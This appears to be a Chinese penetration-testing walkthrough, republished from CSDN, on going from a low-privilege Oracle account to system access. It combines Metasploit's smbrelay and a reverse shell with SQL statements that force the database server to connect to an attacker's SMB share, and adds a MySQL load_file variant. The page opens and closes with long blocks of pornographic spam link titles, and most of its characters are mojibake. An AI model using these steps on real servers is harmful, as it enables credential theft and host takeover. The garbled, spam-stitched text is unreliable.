精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

使用低權(quán)限Oracle數(shù)據(jù)庫(kù)賬戶得到管理員權(quán)限

安全 數(shù)據(jù)安全
這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺(jué)挺有意思的,文檔的 大概意思就是說(shuō),如果 ORACLE 服務(wù)是用 administrator 賬戶啟動(dòng)的,你只要有一個(gè)具有 resource 和connect 權(quán)限的數(shù)據(jù)庫(kù)賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個(gè) SMB 欺 騙 服 務(wù) 器 , 來(lái)得到系統(tǒng)的訪問(wèn)權(quán)限。我本地測(cè)試了下,還真的成功了。

這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺(jué)挺有意思的,文檔的 大概意思就是說(shuō),如果 ORACLE 服務(wù)是用 administrator 賬戶啟動(dòng)的,你只要有一個(gè)具有 resource 和connect 權(quán)限的數(shù)據(jù)庫(kù)賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個(gè) SMB 欺 騙 服 務(wù) 器 , 來(lái)得到系統(tǒng)的訪問(wèn)權(quán)限。我本地測(cè)試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測(cè)試過(guò)程寫出來(lái).

我的滲透環(huán)境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數(shù)據(jù)庫(kù)版本為 10.2.0.1.0,服務(wù)啟動(dòng)權(quán)限為 administrator,數(shù)據(jù)庫(kù)賬戶用的是 dbsnmp 賬戶的默認(rèn)權(quán)限.

 


1.先用 netstat 命令查看一下,本地的 139 端口有沒(méi)有占用,一般占用此端口的服務(wù)就是 Samba 了,要關(guān)掉。ubuntu 的關(guān)閉方法是 sudo /etc/init.d/samba stop




 

2.運(yùn)行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應(yīng)配置后,exploit.就能用 netstat 看到本地已經(jīng)監(jiān)聽(tīng)了 139 和 8522 端口了.





3.我現(xiàn)在使用 dbsnmp 默認(rèn)賬戶連接到 oracle 數(shù)據(jù)庫(kù)上,這個(gè)賬戶默認(rèn)權(quán)限是比較低的,只有 connect和 resource 權(quán)限。

  

4.然后執(zhí)行下面 3 條 SQL 語(yǔ)句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)UNIQUE,ot_format VARCHAR(6));

SQL> INSERT INTO files VALUES(1,'\\192.168.1.52\mickey',NULL);

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context2   PARAMETERS('datastore ctxsys.file_datastore format column ot_format');




當(dāng)執(zhí)行完 create index 這句的時(shí)候,在看咱們本地的 metasploit,就已經(jīng)得到 ORACLE 數(shù)據(jù)庫(kù)主機(jī)的系統(tǒng)當(dāng)前服務(wù)用戶的 half lm 哈希和 cmdshell 了。

  

 




 

后來(lái)經(jīng)過(guò) pt007 的提醒,我又測(cè)試了 mysql,如果服務(wù)也是 administrator 啟動(dòng)的,用

select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統(tǒng)權(quán)限的.MSSQL 應(yīng)該用 xp_dirtree 存儲(chǔ)過(guò)程 也是可以的,不過(guò)我沒(méi)有配置出來(lái)用 administrator 賬戶啟動(dòng) MSSQL 服務(wù),希望知道的朋友指點(diǎn)下我。 這個(gè)技術(shù)可以用到內(nèi)網(wǎng) WEB 評(píng)估的時(shí)候,如果有注入,服務(wù)又是 administrator 啟動(dòng)的,可以提權(quán)了。

【編輯推薦】

  1. 詳解有關(guān)Windows系統(tǒng)下的權(quán)限設(shè)置
  2. SQL Server 2005和Oracle 10g安全性比較
責(zé)任編輯:Oo小孩兒 來(lái)源: CSDN
相關(guān)推薦

2009-11-06 17:39:41

2009-10-22 16:53:08

2009-10-26 17:29:21

Oracle管理員數(shù)據(jù)庫(kù)管理

2011-03-15 13:25:41

Oracle數(shù)據(jù)庫(kù)管理員維護(hù)

2011-03-15 13:06:06

Oracle數(shù)據(jù)庫(kù)管理員

2011-08-17 15:29:00

2014-04-24 09:51:47

Linux管理員ACL集體權(quán)限

2009-10-27 13:20:19

Oracle默認(rèn)管理員

2011-03-15 11:34:43

Oracle數(shù)據(jù)庫(kù)管理員任務(wù)

2010-06-07 21:01:45

管理員權(quán)限GPO

2017-06-14 14:33:58

2009-02-20 20:02:16

2019-07-17 17:00:29

數(shù)據(jù)庫(kù)數(shù)據(jù)庫(kù)管理員DBA

2020-07-21 15:52:01

騰訊云數(shù)據(jù)庫(kù)SQL Server

2019-11-13 17:15:21

Linux工具SUDO

2019-11-12 09:07:35

Linux命sudo

2023-03-22 09:18:53

數(shù)據(jù)庫(kù)管理架構(gòu)

2017-03-14 13:57:15

數(shù)據(jù)庫(kù)權(quán)限分配探討

2010-04-09 17:35:22

2011-03-15 13:18:45

Oracle數(shù)據(jù)庫(kù)管理員
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

综合干狼人综合首页| a毛片在线播放| 久久精品一本| 精品国产一区二区三区四区在线观看| 想看黄色一级片| a级片在线免费| 国产网站一区二区| 97超级碰碰| 国产suv精品一区二区33| 久久久久久久久丰满| 欧美大片在线观看一区二区| 黑人糟蹋人妻hd中文字幕| 日韩毛片久久久| 不卡影院免费观看| 成人美女免费网站视频| 99热在线观看免费精品| 亚洲蜜桃视频| 亚洲欧洲日产国码av系列天堂| 欧美一级免费在线| 欧美××××黑人××性爽| 亚洲一区国产视频| 午夜午夜精品一区二区三区文| www.黄色av| 热久久久久久久| 久久久久久久国产精品| 在线免费看视频| 亚洲春色h网| 精品欧美一区二区在线观看| 奇米视频888| 成人爱爱网址| 亚洲成精国产精品女| 亚洲精品视频一二三| 亚洲av成人精品毛片| 国产乱码精品一区二区三| 国产精品极品在线| 中文字幕69页| 一本色道久久综合亚洲精品不卡| 欧美刺激性大交免费视频| 三区四区在线观看| 亚洲伊人春色| 亚洲精品乱码久久久久久金桔影视| www激情五月| 日韩电影精品| 欧美色偷偷大香| 久久精品99国产| 国产一二三在线| 精品福利免费观看| 日韩欧美不卡在线| 丝袜在线视频| 亚洲一区二区三区美女| 激情五月六月婷婷| av在线麻豆| 亚洲欧美国产77777| 在线观看成人一级片| 91在线播放网站| 国产精品美女久久久久久久| 亚洲国产一区二区三区在线播| 免费在线性爱视频| 久久久蜜臀国产一区二区| 久久精品二区| 可以在线观看的黄色| 久久久www成人免费毛片麻豆| 久久超碰亚洲| 可以免费看污视频的网站在线| 国产网站一区二区三区| 亚洲欧洲精品一区二区三区波多野1战4 | 日本久久一级片| 日本不卡视频| 国产一区二区三区精品欧美日韩一区二区三区 | 国产一区二区三区日韩| 99一区二区三区| 欧美 日韩 国产 成人 在线| av在线不卡电影| 久久久久久亚洲精品不卡4k岛国 | 97国产在线视频| 六月丁香在线视频| 日韩在线一区二区三区| 国产精品亚洲自拍| 国产黄色高清视频| 成人激情午夜影院| 欧美一区激情视频在线观看| av免费观看一区二区| 成人欧美一区二区三区黑人麻豆 | 自拍偷拍视频在线| 久久一卡二卡| 一本到不卡精品视频在线观看| 免费涩涩18网站入口| а天堂中文最新一区二区三区| 日韩免费观看高清完整版| 农村末发育av片一区二区| 成人资源在线| 伊是香蕉大人久久| 久久久久久久久精| 久久婷婷激情| 成人永久免费| 97超碰国产一区二区三区| 一区二区三区在线观看国产| 亚洲乱码中文字幕久久孕妇黑人| 国产精品99久久久久久董美香 | 9191久久久久久久久久久| 久久久久无码国产精品一区李宗瑞| 国产91精品对白在线播放| 久久影院资源网| 国语对白永久免费| 国产精品一卡二卡| 视频一区三区| 丁香花在线电影小说观看| 欧美性生活久久| 人妻av一区二区| 希岛爱理av一区二区三区| 国产91对白在线播放| 国产精品无码在线播放| 久久久久国产精品麻豆ai换脸| 97久久国产亚洲精品超碰热| 免费在线观看一区| 日韩精品在线免费观看视频| 印度午夜性春猛xxx交| 日本不卡视频在线观看| 精品一区日韩成人| 日本精品600av| 欧美日本不卡视频| 久久精品无码一区| 一本综合久久| 国产chinese精品一区二区| 色综合久久影院| 91成人在线观看喷潮| 欧美激情一区二区三区p站| 一区二区三区四区在线观看国产日韩| 日本精品性网站在线观看| 日韩一级免费毛片| 一区二区三区蜜桃网| 在线观看免费不卡av| jiujiure精品视频播放| 欧美专区第一页| 天堂中文在线资源| 亚洲一区二区三区四区在线 | 国产精品久久免费看| 欧美一级片中文字幕| 精品精品国产三级a∨在线| 欧美大片欧美激情性色a∨久久| 国产麻豆免费视频| 最新不卡av在线| 亚洲a级黄色片| 欧美电影免费播放| 国产欧美亚洲精品| 日本在线观看免费| 欧美精品自拍偷拍动漫精品| 一级片黄色录像| 精品一区二区成人精品| 国产一区一区三区| 欧美高清hd| 九九热最新视频//这里只有精品| 国产毛片久久久久| 一区二区三区四区高清精品免费观看| 制服下的诱惑暮生| 亚洲天堂成人| 久久久久久久久久久久久久久久av| 美女91在线看| 亚洲色图欧美制服丝袜另类第一页| 日韩不卡在线播放| 欧美激情一区二区三区全黄 | 99久久久无码国产精品免费蜜柚| 久久久精品黄色| 三级在线免费看| 国产精品久久久久久久| 91手机在线观看| eeuss鲁一区二区三区| 亚洲国产福利在线| 国产污视频网站| 中文字幕一区二区三区乱码在线 | www日韩中文字幕在线看| 国产又爽又黄免费软件| 一区二区三区精品在线观看| 尤物网站在线观看| 视频一区二区中文字幕| 夜夜爽www精品| 911精品国产| 国产成人午夜视频网址| 无遮挡的视频在线观看| 日韩免费电影网站| 黄色片网站在线免费观看| 国产精品三级视频| 亚洲色图欧美另类| 首页国产欧美日韩丝袜| 色呦呦网站入口| 免费日韩一区二区三区| 国产精品视频导航| 美足av综合网| 亚洲视频在线看| 国产99久久九九精品无码免费| 亚洲成av人综合在线观看| 一区二区伦理片| 国产激情一区二区三区四区| 欧美色图色综合| 国产精品88久久久久久| 玖玖玖精品中文字幕| 日韩av懂色| 欧美在线国产精品| 成人毛片av在线| 亚洲欧美资源在线| 亚洲精品18p| 欧美日韩一区二区不卡| 午夜精品久久久久久久久久久久久蜜桃 | 国产美女诱惑一区二区| 99精品视频网站| 一区二区三区日本久久久| 亚洲自拍偷拍区| 欧美影视资讯| 2019中文字幕在线免费观看| 国产在线观看91| 亚洲女同性videos| 精品国产av鲁一鲁一区| 欧美性受极品xxxx喷水| 国产成人精品一区二三区| 国产精品久久久久久久浪潮网站| 久久久久国产精品无码免费看| 精品在线视频一区| 中文字幕第21页| 国产欧美午夜| 国产在线视频综合| 国产精品黑丝在线播放| 涩涩涩999| 免费毛片在线不卡| 久久99精品久久久久久秒播放器 | 日韩一区二区在线观看视频播放| 国产又黄又粗又爽| 一区二区高清在线| 一级免费黄色录像| 国产精品欧美综合在线| 亚洲天堂视频一区| 成人午夜碰碰视频| 午夜性福利视频| 国产精品1024| 1314成人网| 国产综合色精品一区二区三区| 国产精品一区二区羞羞答答| 久久av最新网址| 欧美日韩亚洲一| 免费在线日韩av| 国产在线青青草| 久久高清免费观看| 日本精品免费在线观看| 亚洲神马久久| 成人一级片网站| 久久精品一区二区三区中文字幕| av高清在线免费观看| 亚洲黄色免费| 久色视频在线播放| 国产精品一区毛片| 日韩无套无码精品| 日韩有码一区二区三区| 一本久道综合色婷婷五月| 老色鬼久久亚洲一区二区| 日日碰狠狠丁香久燥| 日韩电影在线一区二区三区| 欧美日韩在线成人| 久久99最新地址| 免费高清视频在线观看| 国产成人精品亚洲午夜麻豆| 国产日韩视频一区| 成人av在线一区二区| 草草地址线路①屁屁影院成人| 久久综合资源网| 级毛片内射视频| 国产精品二区一区二区aⅴ污介绍| 成人做爰视频网站| 一区二区三区在线影院| 国产情侣在线视频| 一本色道久久综合狠狠躁的推荐| 国产又粗又猛又黄视频| 欧美高清视频一二三区| 亚洲精品一区二区三区四区| 日韩精品中文字幕有码专区| av在线第一页| 欧美片一区二区三区| 欧美aaaaa性bbbbb小妇| 国产精品丝袜一区二区三区| 精品欧美视频| 免费成人av网站| 亚洲激情久久| 777米奇影视第四色| 激情六月婷婷久久| 国产精品久久久久久亚洲av| 国产欧美一区二区精品性色超碰| 国产麻豆视频在线观看| 午夜欧美大尺度福利影院在线看 | 巨乳诱惑日韩免费av| 免费黄频在线观看| 99久久免费精品| 亚洲欧美精品久久| 黄色成人av网| 国产精品伦一区二区三区| 亚洲国产美女久久久久| 日本激情视频在线观看| 97高清免费视频| 国产一区二区在线观| 免费久久久一本精品久久区| 你懂的一区二区| 9久久婷婷国产综合精品性色| 成人免费高清视频在线观看| 国产精品理论在线| 亚洲超丰满肉感bbw| 一级全黄裸体免费视频| 日韩精品极品视频| av大全在线| 国产精品h片在线播放| 精品丝袜久久| 秋霞在线一区二区| 免费成人av资源网| 国产福利在线观看视频| 一区二区三区四区视频精品免费| 国产成人麻豆免费观看| 亚洲国产一区二区三区在线观看| 97caopron在线视频| 国产精品精品一区二区三区午夜版 | wwwxx欧美| 日韩.com| 老司机午夜av| 97精品国产露脸对白| 免费三片在线播放| 欧美日本一区二区三区四区| 黄色视屏网站在线免费观看| 韩国一区二区电影| 亚洲精品一区国产| 青青草免费在线视频观看| 美女诱惑一区二区| 永久免费毛片在线观看| 欧美日韩一区二区精品| 色婷婷av一区二区三区之红樱桃| 色中色综合影院手机版在线观看| 香蕉久久久久久| 一本一道久久a久久精品综合| 日韩电影在线一区二区| 魔女鞋交玉足榨精调教| 欧美小视频在线| 日韩欧美电影在线观看| 91地址最新发布| 欧美美女在线直播| 波多野结衣50连登视频| 91一区在线观看| 国产原创视频在线| 亚洲毛片在线观看| 国产欧美一区二区三区精品酒店| 六月婷婷久久| 久久欧美肥婆一二区| 国产人妻一区二区| 色欧美片视频在线观看| 粉嫩av一区| 国产在线精品成人一区二区三区| 97精品国产| 国产农村妇女精品久久| 亚洲精品ww久久久久久p站| 精品人妻久久久久一区二区三区 | 日韩人妻一区二区三区蜜桃视频| 国产一区美女在线| 久草免费新视频| 亚洲第一免费播放区| 自拍网站在线观看| 日韩在线三区| 国内精品视频666| 久久国产露脸精品国产| 亚洲福利视频久久| 午夜激情成人网| 亚洲一区高清| 国产精品亚洲成人| 一级免费在线观看| 一区二区三区视频免费在线观看 | 在线电影欧美成精品| 午夜成年人在线免费视频| 国产区二精品视| 日韩精品欧美精品| 一区二区三区四区五区| 亚洲成av人片在线观看香蕉| 亚洲成人人体| 强伦女教师2:伦理在线观看| 成人免费高清在线观看| 免费无码国产精品| 欧美精品在线播放| 最新国产精品视频| 手机精品视频在线| 欧美视频二区36p| 久久亚洲天堂| 国外成人在线视频网站| 奇米色一区二区| 久久免费播放视频| 亚洲人成网站999久久久综合| 欧美日韩卡一| 欧美精品一区免费| 国产精品对白交换视频| 三级在线视频| 亚洲综合中文字幕68页| 久久av一区| 国产亚洲精久久久久久无码77777| 亚洲男人天堂2019| 亚洲性视频在线| 999精品视频在线| 同产精品九九九| 在线观看午夜av| 亚洲精品高清国产一线久久| 不卡一区二区在线|